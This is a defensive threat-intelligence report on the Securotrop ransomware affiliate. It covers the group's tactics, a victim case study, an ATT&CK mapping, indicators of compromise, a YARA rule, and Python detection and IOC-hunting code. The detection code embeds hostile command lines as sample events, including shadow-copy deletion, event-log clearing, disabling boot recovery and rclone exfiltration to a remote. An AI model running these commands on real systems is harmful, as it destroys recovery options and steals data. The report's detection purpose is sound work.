New Threat Actor: Securotrop

This report provides a comprehensive analysis of Securotrop, a newly identified, financially motivated organized crime group that emerged in October 2025. Securotrop executes a sophisticated double-extortion ransomware model, targeting organizations primarily within the Manufacturing, Construction, Services, Hospitality, and Agriculture sectors across the United States and Canada.

The group’s primary differentiator is its calculated and methodical approach to extortion. Unlike many ransomware operators who treat data exfiltration as a secondary pressure tactic, Securotrop conducts a detailed pre-negotiation analysis of stolen data. The group meticulously evaluates financial records, intellectual property, client lists, and other sensitive materials to accurately assess their economic and operational value. This intelligence-driven approach allows Securotrop to frame ransom demands and negotiation strategies based on the maximum potential damage a data leak would inflict upon the victim, significantly increasing the likelihood of a substantial payout.

Technically, Securotrop operates as an affiliate of the prolific Qilin Ransomware-as-a-Service (RaaS) platform. The group deploys the unmodified Qilin payload for the final encryption stage of its attacks. This payload is a potent, cross-platform malware, built in Go in its early Agenda releases and since rewritten in Rust, capable of targeting Windows, Linux, and VMware ESXi environments with strong encryption algorithms such as ChaCha20 and AES-256. Consequently, all technical intelligence pertaining to the Qilin ransomware is directly applicable to defending against the impact phase of a Securotrop intrusion.

The potential for severe and multifaceted damage from a Securotrop attack is significant, as demonstrated by the breach of Tiger Communications LLC. This incident resulted in the exfiltration of 243 GB of highly sensitive data, leading to operational disruption, financial loss, and extreme reputational and legal exposure.

Key recommendations for defense include:

  • Harden Initial Access Vectors: Prioritize the patching of public-facing applications and secure all remote access services (e.g., VPN, RDP) with phishing-resistant multi-factor authentication (MFA).
  • Enhance Detection of Post-Compromise Activity: Focus detection engineering efforts on identifying “living-off-the-land” techniques, such as the abuse of PowerShell, PsExec, and the deletion of Volume Shadow Copies, which are hallmarks of Securotrop’s manual, low-and-slow intrusion methodology.
  • Implement a Resilient Recovery Strategy: Maintain and regularly test immutable, offline backups to ensure recovery capabilities in the event of a destructive attack that targets backup systems.

Threat Actor Profile: Securotrop (TA5XXX)

Origins and Attribution

Securotrop was first observed in October 2025 and is assessed with high confidence to be an organized crime group operating with a purely financial motivation. The group’s country of origin remains unknown. However, its use of the Qilin RaaS platform provides a potential, albeit unconfirmed, link to the Commonwealth of Independent States (CIS) region. The Qilin RaaS operation, like many of its predecessors, explicitly prohibits targeting entities within CIS countries and is known to recruit affiliates on Russian-language cybercrime forums, characteristics commonly associated with Russian-speaking threat actors. Securotrop’s adherence to this targeting model suggests a possible connection or alignment with this ecosystem.

Modus Operandi: Calculated Extortion

Securotrop’s operational model is defined by a sophisticated and psychologically potent double-extortion strategy. The group’s attack lifecycle has two distinct phases: comprehensive data theft followed by crippling system encryption. This creates two powerful points of leverage, forcing victims to negotiate not only for the restoration of their systems but also for the prevention of a catastrophic data leak.

What elevates Securotrop beyond many of its contemporaries is its core tactic of strategic data analysis. This is not merely data theft; it is a meticulous intelligence-gathering operation conducted after exfiltration but before negotiations commence. The group’s operators systematically review stolen repositories, analyzing financial statements, asset plans, client databases, intellectual property, and other sensitive business records to precisely quantify the potential damage a public leak would cause. This allows them to tailor ransom demands with a high degree of accuracy relative to the victim’s pain threshold. The ransom note itself is weaponized, often listing specific, high-value documents to prove the depth of the compromise and eliminate any doubt in the victim’s mind about the severity of the breach.

The group’s operational infrastructure is consistent with modern RaaS operations, utilizing a TOR-hosted control panel for affiliate management and secure, anonymous chatrooms for victim negotiations. A dedicated data leak site (DLS) is maintained to publish stolen data from organizations that refuse to pay, serving as both a consequence for non-compliance and a public demonstration of their capability to prospective victims.

Relationship with Qilin RaaS

Securotrop is an affiliate that leverages the Qilin ransomware platform, deploying its software payload without any apparent modification. This distinction is critical for accurate attribution, as demonstrated by the initial confusion during the Tiger Communications incident, where the attack was widely misattributed to the Qilin group itself due to the ransomware artifact.

This affiliate relationship exemplifies the specialization that makes the RaaS ecosystem so effective. The core Qilin operators focus on developing, maintaining, and updating a robust, evasive, and highly customizable ransomware payload and its associated infrastructure. They provide this platform to affiliates in exchange for a share of the profits, typically 15-20% of the final ransom payment.

This division of labor allows Securotrop to operate as a specialist in intrusion and extortion. Freed from the complexities of malware development, the group can dedicate its resources and expertise to the most difficult phases of an attack: gaining initial access, maintaining persistence, evading detection over long dwell times, and mastering the psychological aspects of negotiation. By leveraging a best-in-class payload from a dedicated developer, Securotrop becomes a more potent and efficient threat than a monolithic group that attempts to manage all aspects of the operation internally. This symbiotic relationship is a force multiplier, combining Qilin’s technical prowess in malware engineering with Securotrop’s strategic acumen in extortion.

Victimology and Impact Analysis

Targeting Scope

Securotrop demonstrates a clear and deliberate targeting strategy focused on maximizing financial gain while minimizing operational risk.

  • Industries: The group predominantly targets commercial organizations in sectors with high operational dependencies and valuable data, including Manufacturing, Construction, Services, Hospitality, and Agriculture. The focus on manufacturing aligns with broader industry trends, which consistently show this sector to be one of the most heavily targeted by ransomware due to its low tolerance for downtime.
  • Geography: The majority of identified victims are located in the United States and Canada.
  • Exclusions: The group publicly states that it will not target organizations in the Healthcare, Government, or Religious sectors.

This pattern of exclusion points to a calculated, risk-averse targeting philosophy. The Qilin RaaS platform, which provides Securotrop’s payload, has been used in highly disruptive attacks against critical infrastructure, including the June 2024 attack on Synnovis, a pathology provider for the UK’s National Health Service. That incident caused widespread cancellation of medical procedures and generated a massive international law enforcement and media response. Securotrop’s explicit avoidance of such sectors suggests a strategic decision to operate below the threshold that would trigger a similar, disproportionate government response. By focusing on commercial entities, the group can pursue its financial objectives with a lower risk profile, indicating a mature approach designed for long-term operational viability rather than short-term notoriety.

Case Study: Tiger Communications LLC (October 2025)

The ransomware attack on Tiger Communications LLC, a Las Vegas-based company specializing in technological infrastructure, serves as a definitive example of Securotrop’s methodology and the severe impact of its operations.

  • Incident Overview: In early October 2025, Securotrop operators compromised the company’s servers, exfiltrated a massive trove of data, and subsequently encrypted the systems. The attack was publicly claimed by Securotrop on its DLS, and the full dataset was later published online after negotiations presumably failed.
  • Scale of Breach: The threat actors successfully exfiltrated approximately 243 GB of data, a significant volume indicating a deep and prolonged compromise of the company’s network.
  • Data Compromised: Analysis of the leaked data reveals the catastrophic scope of the breach, encompassing the most sensitive categories of personal and corporate information. This dataset exemplifies the type of high-value information Securotrop seeks to leverage during extortion. The compromised data included:
    • Personally Identifiable Information (PII): Copies of passports, birth certificates, residential addresses, phone numbers, and Social Security Numbers (SSNs).
    • Corporate Financial and Legal Records: Comprehensive accounting files, tax documents, and an “Amended Certificate of Revocable Trust.”
    • Sensitive Employee Data: Detailed payroll records, including annual gross salaries, hourly wages, employment contracts, and company contributions.
    • Protected Health and Insurance Information (PHI): Medical reports, diagnoses, treatment documentation, employee contributions for medical coverage, and copies of insurance cards.
  • Consequences and Impact: The attack inflicted multifaceted and lasting damage on the company and its stakeholders. Immediate impacts included operational downtime from encrypted servers and direct financial losses associated with incident response, recovery, and potential regulatory fines. The public release of the 243 GB data cache resulted in severe reputational damage, exposing the company, its employees, and its clients to significant long-term risks. These risks include identity theft, financial fraud, and potential corporate espionage. Furthermore, the exposure of such deeply personal employee data can lead to severe psychological distress and a loss of trust within the organization.

Technical Analysis: Anatomy of a Securotrop Attack (MITRE ATT&CK® Mapping)

Securotrop’s attack methodology is characterized by a patient, hands-on-keyboard approach designed to evade detection during a prolonged dwell time, culminating in the deployment of the Qilin ransomware. The following TTPs represent a composite view of a typical Securotrop intrusion.

A structured view of the threat actor’s behavior is essential for SOC analysts to map existing security controls, identify defensive gaps, and prioritize detection engineering efforts. The MITRE ATT&CK framework provides a standardized language for describing these adversary actions.

Tactic | Technique ID | Technique Name | Description of Securotrop/Qilin Usage
Initial Access | T1190 | Exploit Public-Facing Application | Exploits known vulnerabilities in internet-facing software, such as CVE-2023-27532 in Veeam Backup & Replication, to gain an initial foothold.
Initial Access | T1133 | External Remote Services | Targets misconfigured or vulnerable VPNs and other remote access services to breach the network perimeter.
Initial Access | T1566 | Phishing | Uses phishing and spear-phishing emails with malicious attachments or links to trick employees into executing initial access payloads.
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | Heavily utilizes PowerShell for a wide range of post-compromise activities, including discovery, defense evasion, and execution of payloads, blending in with legitimate administrative tasks.
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Creates scheduled tasks to maintain persistence on compromised systems, ensuring their tools survive reboots and can be executed at later times.
Privilege Escalation | T1068 | Exploitation for Privilege Escalation | Leverages local vulnerabilities to escalate privileges from a standard user to an administrator or SYSTEM-level account.
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Terminates processes and services associated with antivirus (AV) and endpoint detection and response (EDR) solutions to operate unimpeded.
Defense Evasion | T1070.001 | Indicator Removal: Clear Windows Event Logs | Clears Windows Event Logs (e.g., with wevtutil) and other forensic artifacts to hide their tracks and complicate incident response investigations.
Credential Access | T1003 | OS Credential Dumping | Employs tools like Mimikatz to extract plaintext passwords, hashes, and Kerberos tickets from memory (e.g., the LSASS process).
Discovery | T1018 | Remote System Discovery | Conducts network reconnaissance using tools like Nmap or PowerShell scripts to identify high-value assets such as domain controllers and backup servers.
Lateral Movement | T1021.001 | Remote Services: Remote Desktop Protocol | Uses RDP extensively with stolen credentials to move between systems within the compromised network.
Collection | T1005 | Data from Local System | Gathers and stages sensitive files from local systems and network shares in preparation for exfiltration.
Exfiltration | T1048 | Exfiltration Over Alternative Protocol | Uses legitimate data transfer tools like Rclone, WinSCP, and FileZilla to exfiltrate large volumes of data to attacker-controlled external servers (T1567.002, Exfiltration to Cloud Storage, applies when Rclone pushes to a cloud storage provider).
Impact | T1490 | Inhibit System Recovery | Deletes Volume Shadow Copies (VSS) using vssadmin.exe or WMI to prevent easy system restoration from local backups, increasing pressure to pay the ransom.
Impact | T1486 | Data Encrypted for Impact | Deploys the Qilin ransomware payload across the network to encrypt files on Windows, Linux, and VMware ESXi systems, rendering them inaccessible.

Attack Lifecycle Elaboration

Initial Access (TA0001)

Securotrop affiliates gain their initial foothold through a variety of common but effective vectors. They are known to exploit unpatched vulnerabilities in public-facing applications, with a notable example being CVE-2023-27532 in Veeam Backup & Replication software, which allows an attacker to retrieve encrypted credentials stored within the configuration database. They also target external remote services, such as poorly secured VPNs, particularly Fortinet devices, which serve as a direct gateway into the corporate network. Alongside these technical exploits, the group employs traditional phishing and spear-phishing campaigns to deceive users into executing malicious code via tainted attachments or links.

Post-Compromise and Defense Evasion (TA0002 – TA0005)

Once inside a network, Securotrop operators prioritize stealth and persistence. Their reliance on manual, hands-on-keyboard techniques is a deliberate strategy to counter modern security solutions. EDR and XDR platforms are strongest against bursts of machine-speed activity characteristic of automated malware and commodity tooling; behaviour that arrives at human pace through signed, built-in binaries is far harder to separate from routine administration. By operating “low and slow” and using legitimate system administration tools, a technique known as “living-off-the-land”, Securotrop’s actions can be difficult to distinguish from normal network management.

They make extensive use of PowerShell and the Windows Command Shell for execution, discovery, and lateral movement. Persistence is often achieved by creating scheduled tasks that ensure their tools remain active after system reboots. A critical phase of their operation involves systematically dismantling the target’s defenses: terminating security processes, clearing Windows Event Logs to erase evidence of their activity, and, most importantly, inhibiting system recovery. They consistently use the native Windows utility vssadmin.exe or WMI commands to delete all Volume Shadow Copies, removing the victim’s first and easiest option for data restoration and significantly increasing the leverage behind the ransom demand. These commands are almost never run legitimately outside scheduled maintenance, and each one is visible in process-creation telemetry (Windows Security Event ID 4688 with command-line auditing enabled, or Sysmon Event ID 1), so a command-line match on vssadmin delete shadows, wmic shadowcopy delete, or wevtutil cl is a high-fidelity, low-volume alert that should page rather than queue.

Lateral Movement, Exfiltration, and Impact (TA0006 – TA0040)

With elevated privileges, operators move laterally through the network. They use credential dumping tools like Mimikatz to harvest credentials from memory and then use those credentials with RDP and PsExec to access other systems. After mapping the network and identifying high-value data repositories, they begin the collection and exfiltration phase. Large volumes of data are staged and then transferred out of the network using common file transfer tools like Rclone or WinSCP, which are difficult to block at the protocol level because they ride standard SFTP or HTTPS. Rclone is frequently renamed to blend in, but the OriginalFileName recorded from its version resource, its distinctive command-line flags, and the sustained outbound volume to a single external destination all remain detectable.
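The detection logic for the living-off-the-land hallmarks in the two passages above (shadow-copy deletion and event-log clearing, then renamed Rclone and PsExec), as an added example that is not part of the original report or of any vendor product. It assumes process-creation events with Sysmon Event ID 1-style fields (Image, CommandLine, OriginalFileName, ProcessId); the sample events are constructed, and the ATT&CK IDs are those used in the table above.

```python
"""Rules for the living-off-the-land hallmarks described above, run over
constructed Sysmon Event ID 1-style process events. Added example, not code
from the report: OriginalFileName comes from the PE version resource, which
is why renamed rclone.exe and PsExec binaries are still caught."""
import re

POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}


def _field(event: dict, key: str) -> str:
    """Lower-case, drop quotes and collapse whitespace so matching is stable."""
    return re.sub(r"\s+", " ", event.get(key, "").replace('"', "")).strip().lower()


def _image(event: dict) -> str:
    """Basename of the executing image."""
    return _field(event, "Image").rsplit("\\", 1)[-1]


def inhibit_system_recovery(event: dict) -> bool:
    """T1490: shadow-copy and boot-recovery destruction through native tools."""
    img, cmd = _image(event), _field(event, "CommandLine")
    if img == "vssadmin.exe":  # resizing shadowstorage to a tiny /maxsize evicts shadows too
        return "delete shadows" in cmd or "resize shadowstorage" in cmd
    if img == "wmic.exe":
        return "shadowcopy" in cmd and "delete" in cmd
    if img in POWERSHELL:
        return "win32_shadowcopy" in cmd and any(
            s in cmd for s in (".delete(", "remove-wmiobject", "remove-ciminstance"))
    if img == "bcdedit.exe":
        return "recoveryenabled no" in cmd or "bootstatuspolicy ignoreallfailures" in cmd
    return img == "wbadmin.exe" and "delete catalog" in cmd


def clear_event_logs(event: dict) -> bool:
    """T1070.001: wevtutil cl <log> / Clear-EventLog."""
    img, cmd = _image(event), _field(event, "CommandLine")
    if img == "wevtutil.exe":
        return re.search(r"\b(cl|clear-log)\b", cmd) is not None
    return img in POWERSHELL and "clear-eventlog" in cmd


def rclone_exfiltration(event: dict) -> bool:
    """T1048/T1567.002: rclone, even renamed, by version info or by command-line shape."""
    img, cmd = _image(event), _field(event, "CommandLine")
    if "rclone" in img or _field(event, "OriginalFileName") == "rclone.exe":
        return True
    # subcommand, then a remote spec ('name:path'), plus a throughput or config flag
    return (re.search(r"\b(copy|sync|move)\b .*\s\w+:\S*", cmd) is not None
            and any(f in cmd for f in ("--transfers", "--config", "--multi-thread-streams")))


def psexec_service_execution(event: dict) -> bool:
    """T1569.002: PsExec by image name, by OriginalFileName (psexec.c) or its PSEXESVC service."""
    return (_image(event) in {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
            or _field(event, "OriginalFileName") == "psexec.c")


RULES = (("T1490", inhibit_system_recovery), ("T1070.001", clear_event_logs),
         ("T1048", rclone_exfiltration), ("T1569.002", psexec_service_execution))


def detect(events: list) -> list:
    """(technique, ProcessId, CommandLine) for every rule that fires, in event order."""
    return [(tid, e["ProcessId"], e.get("CommandLine", ""))
            for e in events for tid, rule in RULES if rule(e)]


def by_technique(events: list) -> dict:
    """technique -> sorted ProcessIds that fired it."""
    out = {}
    for tid, pid, _ in detect(events):
        out.setdefault(tid, []).append(pid)
    return {tid: sorted(pids) for tid, pids in out.items()}


# Constructed events, not real telemetry; 6 and 7 are benign look-alikes.
SAMPLE_EVENTS = [
    {"ProcessId": 1, "Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"ProcessId": 2, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "CommandLine": "wmic  shadowcopy delete"},
    {"ProcessId": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": 'powershell.exe -nop -w hidden -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"'},
    {"ProcessId": 4, "Image": r"C:\Windows\System32\wevtutil.exe", "OriginalFileName": "wevtutil.exe",
     "CommandLine": "wevtutil.exe cl Security"},
    {"ProcessId": 5, "Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r'svchost.exe copy "D:\Finance" remote:staging --config C:\Windows\Temp\r.conf --transfers 32 -q'},
    {"ProcessId": 6, "Image": r"C:\Windows\System32\vssadmin.exe", "OriginalFileName": "VSSADMIN.EXE",
     "CommandLine": "vssadmin.exe List Shadows"},
    {"ProcessId": 7, "Image": r"C:\Windows\System32\svchost.exe", "OriginalFileName": "svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    {"ProcessId": 8, "Image": r"C:\Windows\Temp\p.exe", "OriginalFileName": "psexec.c",
     "CommandLine": r"p.exe \\FILESERVER -s -d cmd.exe"},
    {"ProcessId": 9, "Image": r"C:\Windows\System32\bcdedit.exe", "OriginalFileName": "bcdedit.exe",
     "CommandLine": "bcdedit.exe /set {default} recoveryenabled No"},
]
```

Running `by_technique(SAMPLE_EVENTS)` yields T1490 for processes 1, 2, 3 and 9, T1070.001 for 4, T1048 for 5 and T1569.002 for 8; the benign `vssadmin list shadows` and the real svchost.exe do not fire. Matching on normalised command lines plus OriginalFileName, rather than on the image path alone, is what makes the renamed binaries in events 5 and 8 visible.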

Only after the data has been successfully exfiltrated and defenses have been disabled do the operators proceed to the final impact stage: deploying the Qilin ransomware. The payload, written in Go and Rust, is highly effective and can target a wide range of operating systems, including Windows clients, servers, and VMware ESXi hypervisors, allowing for the disruption of virtualized environments. The ransomware uses a combination of strong encryption algorithms, including ChaCha20, AES-256, and RSA-4096, which makes recovery of the encrypted files without the decryption key computationally infeasible; recovery therefore depends on backups, not on cryptanalysis. The payload is also highly configurable through the RaaS panel, allowing Securotrop to customize the attack for each specific victim, including which file types to target, which processes to terminate, and the specific text of the ransom note dropped on compromised systems.

Indicators of Compromise (IOCs)

This section provides actionable Indicators of Compromise (IOCs) identified during investigations into Securotrop and Qilin ransomware activity. These indicators can be used by SOC analysts and threat hunters to search for evidence of a compromise within their environments.

The following table consolidates known file hashes, malicious file names, and network indicators. This data provides concrete artifacts for searching logs, SIEMs, and endpoint telemetry.

Indicator Type | Indicator Value | Description | Source (internal ref.)
SHA256 | 93c16c11ffca4ede29338eac53ca9f7c4fbcf68b8ea85ea5ae91a9e00dc77f01 | Qilin/Agenda ransomware payload | 17
SHA256 | 54ff98956c3a0a3bc03a5f43d2c801ebcc1255bed644c78bad55d7f7beebd294 | Qilin/Agenda ransomware payload | 17
SHA256 | e4882b8e8e414e983cf003a5c4038043002a004b63c4f0844a15268332597e80 | Qilin/Agenda ransomware payload | 17
SHA256 | 555964b2fed3cced4c75a383dd4b3cf02776dae224f4848dcc03510b1de4dbf4 | Qilin/Agenda ransomware payload (ELF format for Linux/ESXi) | 17
SHA256 | 0629cd5e187174cb69f3489675f8c84cc0236f11f200be384ed6c1a9aa1ce7a1 | Qilin/Agenda ransomware payload (ELF format for Linux/ESXi) | 17
SHA256 | bf9fc34ef4734520a1f65c1ec0a91b563bf002ac63982cbd2df10791493e9147 | Qilin/Agenda ransomware payload | 17
SHA256 | cd27a31e618fe93df37603e5ece3352a91f27671ee73bdc8ce9ad793cad72a0f | Qilin/Agenda ransomware payload | 17
SHA256 | c26ce932f3609ecd710a3a1ca7f7b96f1b103a11b49a86e9423e03664eaabd40 | Qilin/Agenda ransomware payload (DLL) | 17
SHA256 | 8e1eb0ad22236e325387fdb45aea63f318a672c5d035a21d7b3a64eeafb4c5a2 | Qilin/Agenda ransomware payload | 17
SHA256 | aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1 | main.exe, Go-based reverse proxy tool for C2 tunneling | 27
SHA256 | 011df46e94218cbb2f0b8da13ab3cec397246fdc63436e58b1bf597550a647f6 | TPwSav.sys, vulnerable driver used for kernel-level manipulation | 27
SHA256 | 3dfae7b23f6d1fe6e37a19de0e3b1f39249d146a1d21102dcc37861d337a0633 | upd.exe, renamed binary used to disable EDR and evade detection | 22
File Name | w.exe | Commonly observed filename for the Qilin ransomware payload | 4
File Name | enc.exe | Qilin/Agenda ransomware executable | 17
File Name | update.exe | Qilin/Agenda ransomware executable | 17
File Name | 99.dll | Qilin/Agenda ransomware library | 17
File Name | decryptor_399060b2.exe | Qilin/Agenda decryptor tool | 17
IP Address | 31.192.107.144 | Anomalous IP linked to a Russian cloud hosting provider, used for initial VPN access | 27
IP Address | 216.120.203.26 | External C2 host for encrypted SSH tunnel (hosted by Shock Hosting) | 27
IP Address | 137.184.243.69 | Malicious or rare external endpoint associated with Qilin activity | 7
IP Address | 66.165.243.39 | Malicious or rare external endpoint associated with Qilin activity | 7
Domain | advanced-ip-scanner.com | Vendor download site of Advanced IP Scanner, a legitimate network scanner that Qilin affiliates fetch and run for reconnaissance; a download from this domain is a hunting lead to corroborate with other evidence, not a block-list match | 7
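A hunt over constructed telemetry using the indicators in the table above, as an added example that is not part of the original report. The indicator values are copied from the table; the log lines are constructed. It shows two details the table alone does not: indicators must be normalised before comparison (hash case, defanged `[.]` dots in analyst notes), and the rows do not carry equal weight. The tiers are this example's own labelling, not the report's: advanced-ip-scanner.com is the vendor site of a legitimate tool, so it is tiered as a lead that needs corroboration rather than a block-list match.

```python
"""Hunt for the report's IOCs in constructed telemetry. Added example, not
part of the original report; IOC values are copied from the table, the log
lines and the confidence tiers are this example's own."""
import re

IOCS = {
    # Qilin/Agenda payload hash and the upd.exe EDR killer (table rows 1 and 12)
    "93c16c11ffca4ede29338eac53ca9f7c4fbcf68b8ea85ea5ae91a9e00dc77f01": "high",
    "3dfae7b23f6d1fe6e37a19de0e3b1f39249d146a1d21102dcc37861d337a0633": "high",
    "31.192.107.144": "high",      # initial VPN access
    "216.120.203.26": "high",      # SSH tunnel C2
    "137.184.243.69": "medium",    # rare external endpoint
    "66.165.243.39": "medium",
    "advanced-ip-scanner.com": "lead",  # legitimate vendor site; corroborate before acting
}

_SHA256 = re.compile(r"\b[0-9a-f]{64}\b")
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# hostnames with an alphabetic TLD; stops at ':' so 'host:443' yields 'host'
_HOST = re.compile(r"(?<![\w.-])[a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,}(?![\w-])")


def refang(text: str) -> str:
    """Lower-case and undo common defanging so analyst notes match machine telemetry."""
    text = text.lower().replace("[.]", ".").replace("(.)", ".")
    return text.replace("hxxps://", "https://").replace("hxxp://", "http://")


def atoms(line: str) -> set:
    """Every SHA-256, IPv4 address and hostname in an already-normalised line."""
    found = set(_SHA256.findall(line)) | set(_IPV4.findall(line)) | set(_HOST.findall(line))
    return {a.rstrip(".") for a in found}


def hunt(lines: list) -> list:
    """(line_number, indicator, tier) for every IOC seen, in log order."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        for atom in sorted(atoms(refang(raw))):
            if atom in IOCS:
                hits.append((number, atom, IOCS[atom]))
    return hits


def needs_corroboration(hits: list) -> list:
    """Line numbers whose only evidence is a 'lead'-tier indicator."""
    strong = {n for n, _, tier in hits if tier != "lead"}
    return sorted({n for n, _, tier in hits if tier == "lead"} - strong)


# Constructed log lines (not real telemetry): proxy, VPN, EDR and an analyst note.
SAMPLE_LOGS = [
    "2025-10-03T14:02:11Z proxy src=10.20.4.17 dst=advanced-ip-scanner.com:443 method=GET uri=/download/",
    "2025-10-03T21:40:02Z fortigate action=login status=success srcip=31.192.107.144 user=svc_backup",
    r"2025-10-04T02:15:33Z edr event=file_create path=C:\Windows\Temp\upd.exe "
    "sha256=3DFAE7B23F6D1FE6E37A19DE0E3B1F39249D146A1D21102DCC37861D337A0633",
    "2025-10-04T08:00:00Z proxy src=10.20.4.9 dst=example.com:443 method=GET uri=/",
    "analyst note: host 10.20.4.17 held an ssh session to 216[.]120[.]203[.]26 for 6h",
]
```

`hunt(SAMPLE_LOGS)` returns four hits: the scanner download on line 1 (lead), the VPN login from 31.192.107.144 on line 2, the upd.exe hash on line 3 despite its upper-case spelling, and the refanged C2 address on line 5. `needs_corroboration` singles out line 1, which is exactly the row a SIEM rule should not block on by itself; here the same workstation (10.20.4.17) reappears on line 5 talking to the tunnel host, which is the kind of corroboration that turns the lead into an incident.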

Detection Rules: YARA

YARA rules are instrumental for threat hunters and incident responders to identify malicious files on endpoints or in repositories. The following rule is designed to detect the Qilin ransomware loader used by Securotrop affiliates by matching specific byte patterns and characteristics of the executable file.

/*
   Qilin ransomware Windows loader detection rule.
   NOTE: This rule has been repaired from a malformed original. It identifies
   a potential byte pattern but should be tested and validated against known
   samples and a clean-file corpus before deployment.

   The [4] jumps stand in for the four-byte rel32/disp32 operands that follow
   E8 (call), A3 (mov [addr], eax) and 8B 0D (mov ecx, [addr]); those operand
   bytes were lost when the original rule was flattened. The displacements in
   the pattern confirm the reading: the "75 12" jne skips 18 bytes, exactly
   call (5) + test (2) + je near (6) + mov (5), and each "74 05" je skips one
   5-byte call. The pattern is 32-bit x86:

       85 C0                       test eax, eax
       75 12                       jne  short
       E8 [4]                      call rel32
       85 C0                       test eax, eax
       0F 84 ?? 0? 00 00           je   near
       A3 [4]                      mov  [addr], eax
       68 00 ?? ( 2? | 3? | 4? ) 00  push imm32 (0x00[2-4]?xx00)
       6A 00 / 50                  push 0 / push eax
       E8 [4] ...                  call rel32, then the same test/je/call chain
*/
import "pe"

rule Qilin_Loader_Heuristic {
    meta:
        author = "rivitna"
        family = "ransomware.qilin.windows"
        description = "Detects potential Qilin ransomware Windows loader"
        severity = 10
        score = 100
        source_note = "Corrected from original report TL-2025-1021-SEC-01"
    strings:
        // Byte sequence observed in samples
        $hex_pattern_1 = {
            85 C0 75 12 E8 [4] 85 C0 0F 84 ?? 0? 00 00 A3 [4]
            68 00 ?? ( 2? | 3? | 4? ) 00 6A 00 50 E8 [4] 85 C0 0F 84 ?? 0? 00 00
            8B 0D [4] 85 C9 74 05 E8 [4] 8B F0 85 F6 74 05 E8 [4] 85 C0 75 ?? 68
        }
    condition:
        // PE file header (MZ) and the presence of the hex pattern
        uint16(0) == 0x5a4d and $hex_pattern_1
}
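A way to exercise the rule's byte pattern without a YARA installation, as an added example that is not part of the original report or of the rule author's work: it translates the YARA hex-string grammar the rule uses (fixed bytes, `??` and nibble wildcards, `[n]`/`[n-m]` jumps, `( a | b )` alternatives) into a Python bytes regex and mirrors the rule's condition. The hex string embedded below is the repaired pattern with `[4]` operand jumps, and the byte buffers it is tested against are constructed stubs, not Qilin samples.

```python
"""Translate a YARA hex string into a Python bytes regex and scan a buffer.

Added example, not from the report or from the rule author. It covers only
the hex-string grammar the Qilin_Loader_Heuristic rule uses: fixed bytes,
?? and nibble wildcards, fixed or ranged jumps [n] / [n-m], and ( a | b )
alternatives. The sample buffers below are constructed, not real malware."""
import re

# Repaired pattern; the [4] jumps are the rel32/disp32 operands after
# E8 (call), A3 (mov [addr], eax) and 8B 0D (mov ecx, [addr]).
QILIN_LOADER_HEX = """
    85 C0 75 12 E8 [4] 85 C0 0F 84 ?? 0? 00 00 A3 [4]
    68 00 ?? ( 2? | 3? | 4? ) 00 6A 00 50 E8 [4] 85 C0 0F 84 ?? 0? 00 00
    8B 0D [4] 85 C9 74 05 E8 [4] 8B F0 85 F6 74 05 E8 [4] 85 C0 75 ?? 68
"""

_TOKEN = re.compile(r"\[\d+(?:-\d+)?\]|[0-9A-Fa-f?]{2}|[()|]")


def _nibble_class(tok: str) -> bytes:
    """Regex fragment for a byte with one or both nibbles wildcarded."""
    hi, lo = tok
    if hi == "?" and lo == "?":
        return b"."
    if hi == "?":
        vals = [(h << 4) | int(lo, 16) for h in range(16)]
    else:
        vals = [(int(hi, 16) << 4) | l for l in range(16)]
    return b"[" + b"".join(re.escape(bytes([v])) for v in vals) + b"]"


def hex_string_to_regex(hex_string: str):
    """Compile a YARA-style hex string into a bytes regex (DOTALL so '.' is any byte)."""
    parts = []
    for tok in _TOKEN.findall(hex_string.strip().strip("{}")):
        if tok.startswith("["):                      # jump: [n] or [n-m]
            lo, _, hi = tok[1:-1].partition("-")
            parts.append(b".{%d,%d}" % (int(lo), int(hi)) if hi else b".{%d}" % int(lo))
        elif tok == "(":                             # alternation group
            parts.append(b"(?:")
        elif tok in ("|", ")"):
            parts.append(tok.encode())
        elif "?" in tok:                             # ?? or nibble wildcard
            parts.append(_nibble_class(tok))
        else:                                        # literal byte
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def matches_qilin_loader(sample: bytes) -> bool:
    """Mirror of the rule condition: MZ header at offset 0 and the pattern anywhere."""
    return sample[:2] == b"MZ" and hex_string_to_regex(QILIN_LOADER_HEX).search(sample) is not None


def constructed_hit() -> bytes:
    """Constructed PE-like stub (not a real sample) that satisfies every token."""
    code = bytes.fromhex(
        "85C07512" "E8AABBCCDD" "85C0" "0F84AB010000" "A300104000"
        "6800554000" "6A00" "50" "E811223344" "85C0" "0F84CD020000"
        "8B0D00204000" "85C9" "7405" "E855667788" "8BF0" "85F6" "7405"
        "E899AABBCC" "85C0" "7507" "68")
    return b"MZ" + b"\x90" * 62 + code + b"\x00" * 16


def constructed_miss() -> bytes:
    """Same stub with the push immediate's high byte 0x40 changed to 0x50,
    which falls outside the ( 2? | 3? | 4? ) alternation."""
    return constructed_hit().replace(bytes.fromhex("6800554000"), bytes.fromhex("6800555000"))
```

Running `matches_qilin_loader` on `constructed_hit()` returns True and on `constructed_miss()` False; dropping the MZ header also yields False, exactly as the rule's condition would. The translation is useful for unit-testing a heuristic like this against a corpus of known-good binaries before it is deployed, because a byte pattern this short can collide with ordinary compiler output.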